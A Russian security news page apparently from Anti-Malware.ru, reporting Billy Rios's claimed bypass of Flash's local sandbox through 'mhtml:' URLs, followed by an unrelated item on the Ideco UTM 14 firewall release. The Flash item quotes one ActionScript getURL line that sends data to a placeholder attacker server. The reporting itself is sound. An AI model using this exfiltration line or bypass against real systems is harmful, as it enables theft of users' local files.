Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Яндекс Дзен, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Вышел Ideco UTM 14 с возможностью блокировки по GeoIP

Компания «Айдеко» выпустила новый релиз межсетевого экрана Ideco UTM 14. Одна из основных возможностей - возможность блокировки по GeoIP и новые механизмы журналирования. Для пользователей сделан новый интерфейс, плюс появилась возможность централизованного управления настройками безопасности.

Новые возможности Ideco UTM 14:

  • обновленная платформа на базе ядра Linux 5.18
  • реализована возможность логирования срабатываний правил файрвола
  • LACP (агрегирование каналов)
  • возможность создания правил по GeoIP в файрволе
  • отчетность по событиям модуля Web Application Firewall
  • объект “Список IP-адресов” и добавления списка IP и сетей из файла
  • улучшенный UI/UX многих модулей

«Мы выпускаем уже третий мажорный релиз в 2022 году, включающий в себя новые функции безопасности, блокирующие огромное число атак на российские сервера. В 2023-ем году мы не собираемся останавливаться и готовим релиз высокопроизводительного NGFW-решения, подходящего для дата-центров и даже широких каналов провайдеров. Увидим его уже в первой половине года. Продолжаем работать более интенсивно, чем раньше.», – рассказал директор компании «Айдеко» Дмитрий Хомутов.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Яндекс Дзен, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru